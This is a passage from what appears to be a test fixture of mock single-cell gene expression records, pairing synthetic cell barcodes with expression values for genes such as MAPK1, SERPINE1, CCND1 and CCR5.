"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MAPK1 Expression": {
"name": "MAPK1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.32,
2.0,
1.58,
2.32,
2.32,
1.0,
2.32,
2.32,
2.32,
2.32,
2.81,
2.0,
3.0,
2.58,
3.0,
2.81,
1.58,
1.0,
2.81,
1.0,
1.58,
3.0,
2.81,
2.0,
2.81,
1.58,
2.32,
2.0,
2.32,
2.0,
1.58,
1.0,
1.0,
2.81,
2.81,
3.0,
3.0,
1.0,
2.0,
1.58,
2.32,
1.58,
3.0,
2.0,
2.0,
3.0,
1.58,
2.32,
2.81,
1.58,
3.0,
2.58,
3.0,
2.58,
1.0,
2.0,
2.58,
2.32,
3.0,
3.0,
3.0,
1.58,
2.32,
2.81,
2.81,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"SERPINE1 Cells": {
"name": "SERPINE1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"SERPINE1 Expression": {
"name": "SERPINE1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.32,
3.0,
2.32,
2.58,
2.81,
3.0,
1.58,
2.32,
2.32,
2.0,
1.58,
1.0,
2.58,
1.58,
2.0,
3.0,
1.58,
1.0,
2.58,
1.0,
1.58,
2.32,
2.0,
2.58,
2.0,
3.0,
2.32,
3.0,
1.58,
2.58,
2.32,
2.0,
1.58,
2.58,
1.58,
1.0,
1.0,
2.32,
2.32,
1.58,
2.81,
1.58,
3.0,
1.58,
3.0,
2.58,
1.0,
2.58,
2.0,
2.58,
3.0,
1.58,
2.81,
2.32,
1.0,
3.0,
2.58,
1.58,
2.58,
2.32,
2.81,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CCND1 Cells": {
"name": "CCND1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CCND1 Expression": {
"name": "CCND1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
3.0,
1.58,
2.32,
2.81,
1.58,
2.32,
2.0,
1.0,
3.0,
2.32,
2.0,
3.0,
1.58,
2.58,
2.81,
2.0,
2.32,
3.0,
2.32,
2.81,
2.32,
2.32,
2.58,
1.0,
2.58,
2.81,
2.32,
3.0,
1.0,
2.81,
3.0,
1.58,
2.0,
2.0,
2.58,
2.58,
2.58,
2.58,
2.32,
1.0,
2.58,
2.81,
1.0,
2.32,
1.58,
1.58,
2.0,
2.32,
1.0,
1.58,
2.0,
1.0,
1.58,
2.32,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CCR5 Cells": {
"name": "CCR5 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CCR5 Expression": {
"name": "CCR5 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.0,
2.0,
1.58,
3.0,
2.0,
3.0,
2.58,
1.0,
1.0,
2.81,
3.0,
1.58,
2.0,
2.58,
2.0,
2.32,
1.0,
3.0,
2.58,
2.0,
2.0,
2.0,
2.81,
3.0,
1.0,
2.58,
3.0,
2.58,
2.81,
2.0,
2.0,
2.32,
3.0,
2.0,
1.0,
1.58,
2.32,
1.0,
3.0,
1.0,
2.0,
2.32,
2.0,
2.81,
2.58,
1.0,
2.32,
2.32,
2.81,
2.32,
2.58,
2.32,
2.0,
2.81,
2.32,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"GSTT1 Cells": {
"name": "GSTT1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"GSTT1 Expression": {
"name": "GSTT1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
2.81,
1.58,
3.0,
2.81,
1.58,
1.58,
2.58,
2.32,
2.81,
2.81,
2.58,
2.0,
2.58,
1.58,
2.0,
3.0,
1.58,
2.0,
2.81,
2.81,
1.58,
2.58,
1.58,
2.58,
1.0,
2.0,
2.58,
3.0,
1.58,
2.81,
2.58,
1.0,
2.81,
3.0,
1.58,
2.32,
1.58,
2.0,
2.32,
2.58,
2.32,
2.32,
2.58,
2.81,
2.81,
2.32,
2.32,
2.81,
2.58,
1.0,
2.58,
1.0,
1.58,
2.0,
3.0,
2.81,
1.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CDKN1A Cells": {
"name": "CDKN1A Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB7_BazMoo_5DAADBACDAADAABB-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CDKN1A Expression": {
"name": "CDKN1A Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
3.0,
2.0,
2.32,
2.81,
2.58,
2.81,
2.58,
2.58,
2.58,
1.0,
3.0,
1.0,
1.0,
2.0,
1.0,
3.0,
3.0,
2.58,
1.0,
1.58,
1.0,
1.0,
2.32,
2.0,
1.58,
2.58,
1.58,
1.58,
2.81,
2.58,
2.58,
2.81,
2.58,
2.58,
2.81,
3.0,
2.58,
1.58,
1.58,
2.0,
1.58,
2.0,
2.58,
2.58,
2.32,
2.81,
2.58,
2.0,
2.58,
1.0,
1.58,
1.58,
3.0,
2.58,
1.58,
3.0,
2.58,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PON1 Cells": {
"name": "PON1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
